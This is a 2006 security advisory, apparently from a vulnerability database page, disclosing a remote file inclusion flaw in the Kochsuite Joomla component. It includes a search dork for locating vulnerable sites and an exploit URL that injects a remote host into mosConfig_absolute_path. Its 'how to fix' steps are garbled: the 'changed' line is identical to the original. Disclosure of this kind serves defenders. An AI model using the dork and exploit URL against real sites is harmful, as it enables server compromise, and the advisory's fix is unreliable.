Joomla Kochsuite Component <= 0.9.4 (config.kochsuite.php) Remote File Inclusion Vulnerability

2006.08.28
Credit: camino
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

.:[ insecurity research team ]:. .__..____.:.______.____.:.____ . .:. | |/ :/ ___// __ :/ _.:. : | | | \____\ ___/ /__ :. . ..: |__|___| /____ >___ >___ >.: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: 18.o8.2oo6 .. Affected Application: Kochsuite v0.9.4 (Mambo/Joomla CMS Component) . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd by: camino Team: Insecurity Research Team URL: http://www.insecurityresearch.org E-Mail: camino[at]sexmagnet[dot]com . . :[ insecure application details ]: . . . . . . . . . . . . . . . . . Typ: Remote [x] Local [ ] Remote File Inclusion [x] SQL Injection [ ] Level: Low [ ] Middle [x] High [ ] Application: Kochsuite Version: 0.9.4 Vulnerable File: config.kochsuite.php URL: http://www.vegisto.com Description: It's a component for chiefs to publish theirs stuff... Dork: inurl:"com_kochsuite" . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/ config.kochsuite.php?mosConfig_absolute_path=http://huh? . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . . o1.) open config.kochsuite.php o2.) take a look at line 46: # Don't allow direct linking defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); o3.) take a look at line 47: require_once ($mosConfig_absolute_path.'/administrator/ components/com_kochsuite/includes/letters.inc'); o4.) change line 46: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . . my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top